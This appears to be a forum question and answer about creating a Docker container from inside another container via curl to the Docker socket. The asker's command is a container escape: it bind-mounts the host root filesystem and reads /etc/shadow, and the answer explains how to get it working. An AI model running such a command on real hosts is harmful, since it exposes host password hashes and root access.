# Can't make containers while inside the container?

Tags: docker

I am inside the container, and I am trying to create a new container using CURL.

Here is the command I used,

```
curl -X POST -H "Content-Type: application/json" --unix-socket /run/docker.sock -d '{"Image":"python:3", "Cmd":["cat", "/host/etc/shadow"], "Mounts":[{"Type":"bind", "Source":"/", "Target":"/host"}]}' "http://localhost/containers/create?name=escaping"
```

The error comes up saying: - `{"message":"No such image: python:3"}`

Tried other images, same error comes up.

Answer (score 0):

Okay, this can be a simple question, but still I want to share the answer, I just come to know.

This command only works if the images is already pulled from Docker Hub, it will not go and pull image from Docker Hub.

So to come out from this error,

You need to pull the image first

`docker pull python:3-apache' #or any image`
`Then run the same command again`

Comment: This also depends on mounting the docker socket into the container, which means you have given the container root access on the host.